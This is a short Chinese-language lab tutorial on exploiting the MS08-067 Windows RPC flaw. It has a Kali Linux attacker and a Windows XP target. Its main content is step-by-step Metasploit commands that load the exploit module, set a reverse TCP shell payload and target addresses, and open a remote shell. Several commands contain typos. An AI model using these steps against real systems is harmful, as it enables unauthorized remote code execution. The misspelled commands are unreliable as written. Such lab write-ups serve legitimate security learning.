一、漏洞介紹
如果用戶在受影響的系統(tǒng)上收到特制的 RPC 請求,則該漏洞可能允許遠(yuǎn)程執(zhí)行代碼。在 Microsoft windows 2000、Windows XP 和 Windows Server 2003 系統(tǒng)上,攻擊者可能未經(jīng)身份驗證即可利用此漏洞運(yùn)行任意代碼。此漏洞可能用于進(jìn)行蠕蟲攻擊。 防火墻最佳做法和標(biāo)準(zhǔn)的默認(rèn)防火墻配置有助于保護(hù)網(wǎng)絡(luò)資源免受從企業(yè)外部發(fā)起的攻擊。可以通過安裝本 Microsoft 更新程序來保護(hù)計算機(jī)不受侵害。安裝后,可能必須重新啟動計算機(jī)。
嚴(yán)重等級:Windows 2000;XP;Server 2003為嚴(yán)重,Windows Vista;Server 2008;7 Beta為重要。
二、資源裝備
1.安裝好Kali linux的虛擬機(jī)一臺;
2.Windows xp 計算機(jī)一臺。
3.整裝待發(fā)的小白一個。
三、攻防實(shí)戰(zhàn)
2.1 在kali中啟動MSF。
打開終端 鍵入命令:msfconsole
2.2 配置相關(guān)參數(shù)
①鍵入命令:search ms08-067
②復(fù)制msf返回的命令前加use:use exploit/windows/ms08-067 netapi
③設(shè)置payload: set paylodad windows/shell/revers tcp
④顯示需要配置的參數(shù) :show options
⑤設(shè)置靶機(jī)(win xp)IP地址 set rhosts 192.168.xxx.xxx
⑥設(shè)置本機(jī)(kali) IP地址 set lhost 192.168.xxx.xxx
⑦設(shè)置靶機(jī)系統(tǒng)(可不設(shè)置) set targets xx(xx為靶機(jī)系統(tǒng)編號)
2.3 運(yùn)行payload,接受shell
鍵入命令:exploit ,片刻后即可回顯靶機(jī)shell






